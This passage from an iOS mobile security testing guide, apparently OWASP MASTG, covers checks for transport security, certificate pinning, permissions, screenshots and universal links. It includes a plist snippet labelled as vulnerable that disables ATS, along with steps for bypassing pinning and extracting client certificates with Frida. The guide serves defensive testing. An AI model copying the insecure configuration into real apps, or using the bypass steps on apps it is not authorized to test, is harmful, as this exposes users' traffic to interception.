If the application opens third party web sites in WebViews, then from iOS 10 onwards NSAllowsArbitraryLoadsInWebContent
can be used to disable ATS restrictions for the content loaded in web views.
Apple warns: Disabling ATS means that unsecured HTTP connections are allowed. HTTPS connections are also allowed, and are still subject to default server trust evaluation. However, extended security checks\u2014like requiring a minimum Transport Layer Security (TLS) protocol version\u2014are disabled. Without ATS, you\u2019re also free to loosen the default server trust requirements, as described in \"Performing Manual Server Trust Authentication\".
The following snippet shows a vulnerable example of an app disabling ATS restrictions globally.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSAllowsArbitraryLoads</key>\n <true/>\n</dict>\n
ATS should be examined taking the application's context into consideration. The application may have to define ATS exceptions to fulfill its intended purpose. For example, the Firefox iOS application has ATS disabled globally. This exception is acceptable because otherwise the application would not be able to connect to any HTTP website that does not have all the ATS requirements. In some cases, apps might disable ATS globally but enable it for certain domains to e.g. securely load metadata or still allow secure login.
ATS should include a justification string for this (e.g. \"The app must connect to a server managed by another entity that doesn\u2019t support secure connections.\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Remember to inspect the corresponding justifications to discard that it might be part of the app intended purpose.
It is possible to verify which ATS settings can be used when communicating to a certain endpoint. On macOS the command line utility nscurl
can be used. A permutation of different settings will be executed and verified against the specified endpoint. If the default ATS secure connection test is passing, ATS can be used in its default secure configuration. If there are any fails in the nscurl output, please change the server side configuration of TLS to make the server side more secure, rather than weakening the configuration in ATS on the client. See the article \"Identifying the Source of Blocked Connections\" in the Apple Developer Documentation for more details.
Refer to section \"Verifying the TLS Settings\" in chapter Testing Network Communication for details.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/","title":"Testing Endpoint Identity Verification","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#static-analysis","title":"Static Analysis","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
These are some of the issues that should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Apple documentation.
We highly recommend supporting static analysis with the dynamic analysis. If you don't have the source code or the app is difficult to reverse engineer, having a solid dynamic analysis strategy can definitely help. In that case you won't know if the app uses low or high-level APIs but you can still test for different trust evaluation scenarios (e.g. \"does the app accept a self-signed certificate?\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#dynamic-analysis","title":"Dynamic Analysis","text":"Our test approach is to gradually relax security of the SSL handshake negotiation and check which security mechanisms are enabled.
If executing the instructions from the previous step doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. However, you still need to bypass the pinning in order to test the application. Please refer to the section \"Bypassing Certificate Pinning\" for more information on this.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#static-analysis","title":"Static Analysis","text":"Verify that the server certificate is pinned. Pinning can be implemented on various levels in terms of the certificate tree presented by the server:
The latest approach recommended by Apple is to specify a pinned CA public key in the Info.plist
file under App Transport Security Settings. You can find an example in their article Identity Pinning: How to configure server certificates for your app.
Another common approach is to use the connection:willSendRequestForAuthenticationChallenge:
method of NSURLConnectionDelegate
to check if the certificate provided by the server is valid and matches the certificate stored in the app. You can find more details in the HTTPS Server Trust Evaluation technical note.
The following third-party libraries include pinning functionality:
ServerTrustPolicy
per domain for which you can define a PinnedCertificatesTrustEvaluator
. See its documentation for more details.AFSecurityPolicy
to configure your pinning.Follow the instructions from the Dynamic Analysis section of \"Testing Endpoint Identity Verification. If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#client-certificate-validation","title":"Client certificate validation","text":"Some applications use mTLS (mutual TLS), meaning that the application verifies the server's certificate and the server verifies the client's certificate. You can notice this if there is an error in Burp Alerts tab indicating that client failed to negotiate connection.
There are a couple of things worth noting:
The most common and improper way of using mTLS is to store the client certificate within the application bundle and hardcode the password. This obviously does not bring much security, because all clients will share the same certificate.
A second way of storing the certificate (and possibly password) is to use the Keychain. Upon first login, the application should download the personal certificate and store it securely in the Keychain.
Sometimes applications have one certificate that is hardcoded and use it for the first login and then the personal certificate is downloaded. In this case, check if it's possible to still use the 'generic' certificate to connect to the server.
Once you have extracted the certificate from the application (e.g. using Frida), add it as client certificate in Burp, and you will be able to intercept the traffic.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/","title":"Determining Whether Sensitive Data Is Exposed via IPC Mechanisms","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#static-analysis","title":"Static Analysis","text":"The following section summarizes keywords that you should look for to identify IPC implementations within iOS source code.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#xpc-services","title":"XPC Services","text":"Several classes may be used to implement the NSXPCConnection API:
You can set security attributes for the connection. The attributes should be verified.
Check for the following two files in the Xcode project for the XPC Services API (which is C-based):
xpc.h
connection.h
Keywords to look for in low-level implementations:
Keywords to look for in high-level implementations (Core Foundation and Foundation wrappers):
Keywords to look for:
Verify IPC mechanisms with static analysis of the iOS source code. No iOS tool is currently available to verify IPC usage.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/","title":"Checking for Sensitive Data Disclosed Through the User Interface","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#static-analysis","title":"Static Analysis","text":"A text field that masks its input can be configured in two ways:
Storyboard In the iOS project's storyboard, navigate to the configuration options for the text field that takes sensitive data. Make sure that the option \"Secure Text Entry\" is selected. If this option is activated, dots are shown in the text field in place of the text input.
Source Code If the text field is defined in the source code, make sure that the option isSecureTextEntry
is set to \"true\". This option obscures the text input by showing dots.
sensitiveTextField.isSecureTextEntry = true\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that either show such information or take it as input.
If the information is masked by, for example, asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/","title":"Testing Auto-Generated Screenshots for Sensitive Information","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#static-analysis","title":"Static Analysis","text":"If you have the source code, search for the applicationDidEnterBackground
method to determine whether the application sanitizes the screen before being backgrounded.
The following is a sample implementation using a default background image (overlayImage.png
) whenever the application is backgrounded, overriding the current view:
Swift:
private var backgroundImage: UIImageView?\n\nfunc applicationDidEnterBackground(_ application: UIApplication) {\n let myBanner = UIImageView(image: #imageLiteral(resourceName: \"overlayImage\"))\n myBanner.frame = UIScreen.main.bounds\n backgroundImage = myBanner\n window?.addSubview(myBanner)\n}\n\nfunc applicationWillEnterForeground(_ application: UIApplication) {\n backgroundImage?.removeFromSuperview()\n}\n
Objective-C:
@property (UIImageView *)backgroundImage;\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n UIImageView *myBanner = [[UIImageView alloc] initWithImage:@\"overlayImage.png\"];\n self.backgroundImage = myBanner;\n self.backgroundImage.bounds = UIScreen.mainScreen.bounds;\n [self.window addSubview:myBanner];\n}\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n [self.backgroundImage removeFromSuperview];\n}\n
This sets the background image to overlayImage.png
whenever the application is backgrounded. It prevents sensitive data leaks because overlayImage.png
will always override the current view.
You can use a visual approach to quickly validate this test case using any iOS device (jailbroken or not):
If required, you may also collect evidence by performing steps 1 to 3 on a jailbroken device or a non-jailbroken device after repackaging the app with the Frida Gadget. After that, connect to the iOS device per SSH or by other means and navigate to the Snapshots directory. The location may differ on each iOS version but it's usually inside the app's Library directory. For instance, on iOS 14.5 the Snapshots directory is located at:
/var/mobile/Containers/Data/Application/$APP_ID/Library/SplashBoard/Snapshots/sceneID:$APP_NAME-default/\n
The screenshots inside that folder should not contain any sensitive information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/","title":"Testing App Permissions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#static-analysis","title":"Static Analysis","text":"Since iOS 10, these are the main areas which you need to inspect for permissions:
If having the original source code, you can verify the permissions included in the Info.plist
file:
Info.plist
file in the default editor and search for the keys starting with \"Privacy -\"
.You may switch the view to display the raw values by right-clicking and selecting \"Show Raw Keys/Values\" (this way for example \"Privacy - Location When In Use Usage Description\"
will turn into NSLocationWhenInUseUsageDescription
).
If only having the IPA:
Info.plist
is located in Payload/<appname>.app/Info.plist
.plutil -convert xml1 Info.plist
) as explained in the chapter \"iOS Basic Security Testing\", section \"The Info.plist File\".Inspect all purpose strings Info.plist keys, usually ending with UsageDescription
:
<plist version=\"1.0\">\n<dict>\n <key>NSLocationWhenInUseUsageDescription</key>\n <string>Your location is used to provide turn-by-turn directions to your destination.</string>\n
For each purpose string in the Info.plist
file, check if the permission makes sense.
For example, imagine the following lines were extracted from a Info.plist
file used by a Solitaire game:
<key>NSHealthClinicalHealthRecordsShareUsageDescription</key>\n<string>Share your health data with us!</string>\n<key>NSCameraUsageDescription</key>\n<string>We want to access your camera</string>\n
It should be suspicious that a regular solitaire game requests this kind of resource access as it probably does not have any need for accessing the camera nor a user's health-records.
Apart from simply checking if the permissions make sense, further analysis steps might be derived from analyzing purpose strings e.g. if they are related to storage sensitive data. For example, NSPhotoLibraryUsageDescription
can be considered as a storage permission giving access to files that are outside of the app's sandbox and might also be accessible by other apps. In this case, it should be tested that no sensitive data is being stored there (photos in this case). For other purpose strings like NSLocationAlwaysUsageDescription
, it must be also considered if the app is storing this data securely. Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
When you do not have the original source code, you should analyze the IPA and search inside for the embedded provisioning profile that is usually located in the root app bundle folder (Payload/<appname>.app/
) under the name embedded.mobileprovision
.
This file is not a .plist
, it is encoded using Cryptographic Message Syntax. On macOS you can inspect an embedded provisioning profile's entitlements using the following command:
security cms -D -i embedded.mobileprovision\n
and then search for the Entitlements key region (<key>Entitlements</key>
).
If you only have the app's IPA or simply the installed app on a jailbroken device, you normally won't be able to find .entitlements
files. This could be also the case for the embedded.mobileprovision
file. Still, you should be able to extract the entitlements property lists from the app binary yourself (which you've previously obtained as explained in the \"iOS Basic Security Testing\" chapter, section \"Acquiring the App Binary\").
The following steps should work even when targeting an encrypted binary. If for some reason they don't, you'll have to decrypt and extract the app with e.g. Clutch (if compatible with your iOS version), frida-ios-dump or similar.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#extracting-the-entitlements-plist-from-the-app-binary","title":"Extracting the Entitlements Plist from the App Binary","text":"If you have the app binary on your computer, one approach is to use binwalk to extract (-e
) all XML files (-y=xml
):
$ binwalk -e -y=xml ./Telegram\\ X\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n1430180 0x15D2A4 XML document, version: \"1.0\"\n1458814 0x16427E XML document, version: \"1.0\"\n
Or you can use radare2 (-qc
to quietly run one command and exit) to search all strings on the app binary (izz
) containing \"PropertyList\" (~PropertyList
):
$ r2 -qc 'izz~PropertyList' ./Telegram\\ X\n\n0x0015d2a4 ascii <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\n...<key>com.apple.security.application-groups</key>\\n\\t\\t<array>\n\\n\\t\\t\\t<string>group.ph.telegra.Telegraph</string>...\n\n0x0016427d ascii H<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\\n\n<dict>\\n\\t<key>cdhashes</key>...\n
In both cases (binwalk or radare2) we were able to extract the same two plist
files. If we inspect the first one (0x0015d2a4) we see that we were able to completely recover the original entitlements file from Telegram.
Note: the strings
command will not help here as it will not be able to find this information. Better use grep with the -a
flag directly on the binary or use radare2 (izz
)/rabin2 (-zz
).
If you access the app binary on the jailbroken device (e.g via SSH), you can use grep with the -a, --text
flag (treats all files as ASCII text):
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/\n 15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/Telegram X.app/Telegram\\ X\n\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n <dict>\n <key>com.apple.security.application-groups</key>\n <array>\n ...\n
Play with the -A num, --after-context=num
flag to display more or less lines. You may use tools like the ones we presented above as well, if you have them also installed on your jailbroken iOS device.
This method should work even if the app binary is still encrypted (it was tested against several App Store apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#source-code-inspection","title":"Source Code Inspection","text":"After having checked the <appname>.entitlements
file and the Info.plist
file, it is time to verify how the requested permissions and assigned capabilities are put to use. For this, a source code review should be enough. However, if you don't have the original source code, verifying the use of permissions might be specially challenging as you might need to reverse engineer the app, refer to the \"Dynamic Analysis\" for more details on how to proceed.
When doing a source code review, pay attention to:
Info.plist
file match the programmatic implementations.Users can grant or revoke authorization at any time via \"Settings\", therefore apps normally check the authorization status of a feature before accessing it. This can be done by using dedicated APIs available for many system frameworks that provide access to protected resources.
You can use the Apple Developer Documentation as a starting point. For example:
state
property of the CBCentralManager
class is used to check system-authorization status for using Bluetooth peripherals.Location: search for methods of CLLocationManager
, e.g. locationServicesEnabled
.
func checkForLocationServices() {\n if CLLocationManager.locationServicesEnabled() {\n // Location services are available, so query the user\u2019s location.\n } else {\n // Update your app\u2019s UI to show that the location is unavailable.\n }\n}\n
See Table1 in \"Determining the Availability of Location Services\" (Apple Developer Documentation) for a complete list.
Go through the application searching for usages of these APIs and check what happens to sensitive data that might be obtained from them. For example, it might be stored or transmitted over the network, if this is the case, proper data protection and transport security should be additionally verified.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#dynamic-analysis","title":"Dynamic Analysis","text":"With help of the static analysis you should already have a list of the included permissions and app capabilities in use. However, as mentioned in \"Source Code Inspection\", spotting the sensitive data and APIs related to those permissions and app capabilities might be a challenging task when you don't have the original source code. Dynamic analysis can help here getting inputs to iterate onto the static analysis.
Following an approach like the one presented below should help you spotting the mentioned sensitive data and APIs:
NSLocationWhenInUseUsageDescription
).Core Location
). You may use the Apple Developer Documentation for this.CLLocationManager
), for example, using frida-trace
.Once all methods were identified, you might use this knowledge to reverse engineer the app and try to find out how the data is being handled. While doing that you might spot new methods involved in the process which you can again feed to step 3. above and keep iterating between static and dynamic analysis.
In the following example we use Telegram to open the share dialog from a chat and frida-trace to identify which methods are being called.
First we launch Telegram and start a trace for all methods matching the string \"authorizationStatus\" (this is a general approach because more classes apart from CLLocationManager
implement this method):
frida-trace -U \"Telegram\" -m \"*[* *authorizationStatus*]\"\n
-U
connects to the USB device. -m
includes an Objective-C method to the traces. You can use a glob pattern (e.g. with the \"*\" wildcard, -m \"*[* *authorizationStatus*]\"
means \"include any Objective-C method of any class containing 'authorizationStatus'\"). Type frida-trace -h
for more information.
Now we open the share dialog:
The following methods are displayed:
1942 ms +[PHPhotoLibrary authorizationStatus]\n 1959 ms +[TGMediaAssetsLibrary authorizationStatusSignal]\n 1959 ms | +[TGMediaAssetsModernLibrary authorizationStatusSignal]\n
If we click on Location, another method will be traced:
11186 ms +[CLLocationManager authorizationStatus]\n 11186 ms | +[CLLocationManager _authorizationStatus]\n 11186 ms | | +[CLLocationManager _authorizationStatusForBundleIdentifier:0x0 bundle:0x0]\n
Use the auto-generated stubs of frida-trace to get more information like the return values and a backtrace. Do the following modifications to the JavaScript file below (the path is relative to the current directory):
// __handlers__/__CLLocationManager_authorizationStatus_.js\n\n onEnter: function (log, args, state) {\n log(\"+[CLLocationManager authorizationStatus]\");\n log(\"Called from:\\n\" +\n Thread.backtrace(this.context, Backtracer.ACCURATE)\n .map(DebugSymbol.fromAddress).join(\"\\n\\t\") + \"\\n\");\n },\n onLeave: function (log, retval, state) {\n console.log('RET :' + retval.toString());\n }\n
Clicking again on \"Location\" reveals more information:
3630 ms -[CLLocationManager init]\n 3630 ms | -[CLLocationManager initWithEffectiveBundleIdentifier:0x0 bundle:0x0]\n 3634 ms -[CLLocationManager setDelegate:0x14c9ab000]\n 3641 ms +[CLLocationManager authorizationStatus]\nRET: 0x4\n 3641 ms Called from:\n0x1031aa158 TelegramUI!+[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]\n 0x10337e2c0 TelegramUI!-[TGLocationPickerController initWithContext:intent:]\n 0x101ee93ac TelegramUI!0x1013ac\n
We see that +[CLLocationManager authorizationStatus]
returned 0x4
(CLAuthorizationStatus.authorizedWhenInUse) and was called by +[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]
. As we anticipated before, you might use this kind of information as an entry point when reverse engineering the app and from there get inputs (e.g. names of classes or methods) to keep feeding the dynamic analysis.
Next, there is a visual way to inspect the status of some app permissions when using the iPhone/iPad by opening \"Settings\" and scrolling down until you find the app you're interested in. When clicking on it, this will open the \"ALLOW APP_NAME TO ACCESS\" screen. However, not all permissions might be displayed yet. You will have to trigger them in order to be listed on that screen.
For example, in the previous example, the \"Location\" entry was not being listed until we triggered the permission dialogue for the first time. Once we did it, no matter if we allowed the access or not, the \"Location\" entry will be displayed.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/","title":"Testing Universal Links","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis","title":"Static Analysis","text":"Testing universal links on a static approach includes doing the following:
Universal links require the developer to add the Associated Domains entitlement and include in it a list of the domains that the app supports.
In Xcode, go to the Capabilities tab and search for Associated Domains. You can also inspect the .entitlements
file looking for com.apple.developer.associated-domains
. Each of the domains must be prefixed with applinks:
, such as applinks:www.mywebsite.com
.
Here's an example from Telegram's .entitlements
file:
<key>com.apple.developer.associated-domains</key>\n <array>\n <string>applinks:telegram.me</string>\n <string>applinks:t.me</string>\n </array>\n
More detailed information can be found in the archived Apple Developer Documentation.
If you don't have the original source code you can still search for them, as explained in \"Entitlements Embedded in the Compiled App Binary\".
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#retrieving-the-apple-app-site-association-file","title":"Retrieving the Apple App Site Association File","text":"Try to retrieve the apple-app-site-association
file from the server using the associated domains you got from the previous step. This file needs to be accessible via HTTPS, without any redirects, at https://<domain>/apple-app-site-association
or https://<domain>/.well-known/apple-app-site-association
.
You can retrieve it yourself using your browser and navigating to https://<domain>/apple-app-site-association
, https://<domain>/.well-known/apple-app-site-association
or using Apple's CDN at https://app-site-association.cdn-apple.com/a/v1/<domain>
.
Alternatively, you can use the Apple App Site Association (AASA) Validator. After entering the domain, it will display the file, verify it for you and show the results (e.g. if it is not being properly served over HTTPS). See the following example from apple.com https://www.apple.com/.well-known/apple-app-site-association
:
{\n \"activitycontinuation\": {\n \"apps\": [\n \"W74U47NE8E.com.apple.store.Jolly\"\n ]\n },\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"W74U47NE8E.com.apple.store.Jolly\",\n \"paths\": [\n \"NOT /shop/buy-iphone/*\",\n \"NOT /us/shop/buy-iphone/*\",\n \"/xc/*\",\n \"/shop/buy-*\",\n \"/shop/product/*\",\n \"/shop/bag/shared_bag/*\",\n \"/shop/order/list\",\n \"/today\",\n \"/shop/watch/watch-accessories\",\n \"/shop/watch/watch-accessories/*\",\n \"/shop/watch/bands\",\n ] } ] }\n}\n
The \"details\" key inside \"applinks\" contains a JSON representation of an array that might contain one or more apps. The \"appID\" should match the \"application-identifier\" key from the app\u2019s entitlements. Next, using the \"paths\" key, the developers can specify certain paths to be handled on a per app basis. Some apps, like Telegram use a standalone * (\"paths\": [\"*\"]
) in order to allow all possible paths. Only if specific areas of the website should not be handled by some app, the developer can restrict access by excluding them by prepending a \"NOT \"
(note the whitespace after the T) to the corresponding path. Also remember that the system will look for matches by following the order of the dictionaries in the array (first match wins).
This path exclusion mechanism is not to be seen as a security feature but rather as a filter that developers might use to specify which apps open which links. By default, iOS does not open any unverified links.
Remember that universal links verification occurs at installation time. iOS retrieves the AASA file for the declared domains (applinks
) in its com.apple.developer.associated-domains
entitlement. iOS will refuse to open those links if the verification did not succeed. Some reasons to fail verification might include:
appID
s do not match (this would be the case of a malicious app). iOS would successfully prevent any possible hijacking attacks.In order to receive links and handle them appropriately, the app delegate has to implement application:continueUserActivity:restorationHandler:
. If you have the original project try searching for this method.
Please note that if the app uses openURL:options:completionHandler:
to open a universal link to the app's website, the link won't open in the app. As the call originates from the app, it won't be handled as a universal link.
From Apple Docs: When iOS launches your app after a user taps a universal link, you receive an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the URL that the user is accessing. The webpage URL property always contains an HTTP or HTTPS URL, and you can use NSURLComponents
APIs to manipulate the components of the URL. [...] To protect users\u2019 privacy and security, you should not use HTTP when you need to transport data; instead, use a secure transport protocol such as HTTPS.
From the note above we can highlight that:
NSUserActivity
object comes from the continueUserActivity
parameter, as seen in the method above.webpageURL
must be HTTP or HTTPS (any other scheme should throw an exception). The scheme
instance property of URLComponents
/ NSURLComponents
can be used to verify this.If you don't have the original source code you can use radare2 or rabin2 to search the binary strings for the link receiver method:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep restorationHan\n\n0x1000deea9 53 52 application:continueUserActivity:restorationHandler:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-the-data-handler-method","title":"Checking the Data Handler Method","text":"You should check how the received data is validated. Apple explicitly warns about this:
Universal links offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow universal links to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
As stated in the Apple Developer Documentation, when iOS opens an app as the result of a universal link, the app receives an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the HTTP or HTTPS URL that the user accesses. The following example in Swift verifies exactly this before opening the URL:
func application(_ application: UIApplication, continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool {\n // ...\n if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL {\n application.open(url, options: [:], completionHandler: nil)\n }\n\n return true\n}\n
In addition, remember that if the URL includes parameters, they should not be trusted before being carefully sanitized and validated (even when coming from a trusted domain). For example, they might have been spoofed by an attacker or might include malformed data. If that is the case, the whole URL and therefore the universal link request must be discarded.
The NSURLComponents
API can be used to parse and manipulate the components of the URL. This can be also part of the method application:continueUserActivity:restorationHandler:
itself or might occur on a separate method being called from it. The following example demonstrates this:
func application(_ application: UIApplication,\n continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([Any]?) -> Void) -> Bool {\n guard userActivity.activityType == NSUserActivityTypeBrowsingWeb,\n let incomingURL = userActivity.webpageURL,\n let components = NSURLComponents(url: incomingURL, resolvingAgainstBaseURL: true),\n let path = components.path,\n let params = components.queryItems else {\n return false\n }\n\n if let albumName = params.first(where: { $0.name == \"albumname\" })?.value,\n let photoIndex = params.first(where: { $0.name == \"index\" })?.value {\n // Interact with album name and photo index\n\n return true\n\n } else {\n // Handle when album and/or album name or photo index missing\n\n return false\n }\n}\n
Finally, as stated above, be sure to verify that the actions triggered by the URL do not expose sensitive information or risk the user\u2019s data in any way.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-if-the-app-is-calling-other-apps-universal-links","title":"Checking if the App is Calling Other App's Universal Links","text":"An app might be calling other apps via universal links in order to simply trigger some actions or to transfer information, in that case, it should be verified that it is not leaking sensitive information.
If you have the original source code, you can search it for the openURL:options: completionHandler:
method and check the data being handled.
Note that the openURL:options:completionHandler:
method is not only used to open universal links but also to call custom URL schemes.
This is an example from the Telegram app:
}, openUniversalUrl: { url, completion in\n if #available(iOS 10.0, *) {\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n }\n\n if let parsedUrl = parsedUrl {\n return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in completion.completion(value)}\n )\n
Note how the app adapts the scheme
to \"https\" before opening it and how it uses the option UIApplicationOpenURLOptionUniversalLinksOnly: true
that opens the URL only if the URL is a valid universal link and there is an installed app capable of opening that URL.
If you don't have the original source code, search in the symbols and in the strings of the app binary. For example, we will search for Objective-C methods that contain \"openURL\":
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep openURL\n\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000df2c9 9 8 openURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n
As expected, openURL:options:completionHandler:
is among the ones found (remember that it might be also present because the app opens custom URL schemes). Next, to ensure that no sensitive information is being leaked you'll have to perform dynamic analysis and inspect the data being transmitted. Please refer to \"Identifying and Hooking the URL Handler Method\" for some examples on hooking and tracing this method.
If an app is implementing universal links, you should have the following outputs from the static analysis:
You can use this now to dynamically test them:
Unlike custom URL schemes, unfortunately you cannot test universal links from Safari just by typing them in the search bar directly as this is not allowed by Apple. But you can test them anytime using other apps like the Notes app:
To do it from Safari you will have to find an existing link on a website that, once clicked, will be recognized as a Universal Link. This can be a bit time consuming.
Alternatively you can also use Frida for this, see the section \"Performing URL Requests\" for more details.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#identifying-valid-universal-links","title":"Identifying Valid Universal Links","text":"First of all we will see the difference between opening an allowed Universal Link and one that shouldn't be allowed.
From the apple-app-site-association
of apple.com we have seen above we chose the following paths:
\"paths\": [\n \"NOT /shop/buy-iphone/*\",\n ...\n \"/today\",\n
One of them should offer the \"Open in app\" option and the other should not.
If we long press on the first one (http://www.apple.com/shop/buy-iphone/iphone-xr
) it only offers the option to open it (in the browser).
If we long press on the second (http://www.apple.com/today
) it shows options to open it in Safari and in \"Apple Store\":
Note that there is a difference between a click and a long press. Once we long press a link and select an option, e.g. \"Open in Safari\", this will become the default option for all future clicks until we long press again and select another option.
If we repeat the process on the method application:continueUserActivity: restorationHandler:
by either hooking or tracing, we will see how it gets called as soon as we open the allowed universal link. For this you can use for example frida-trace
:
frida-trace -U \"Apple Store\" -m \"*[* *restorationHandler*]\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#tracing-the-link-receiver-method","title":"Tracing the Link Receiver Method","text":"This section explains how to trace the link receiver method and how to extract additional information. For this example, we will use Telegram, as there are no restrictions in its apple-app-site-association
file:
{\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"X834Q8SBVP.org.telegram.TelegramEnterprise\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"C67CF9S4VU.ph.telegra.Telegraph\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"X834Q8SBVP.org.telegram.Telegram-iOS\",\n \"paths\": [\n \"*\"\n ]\n }\n ]\n }\n}\n
In order to open the links we will also use the Notes app and frida-trace with the following pattern:
frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\n
Write https://t.me/addstickers/radare
 (found through a quick Internet search) and open it from the Notes app.
(found through a quick Internet research) and open it from the Notes app.
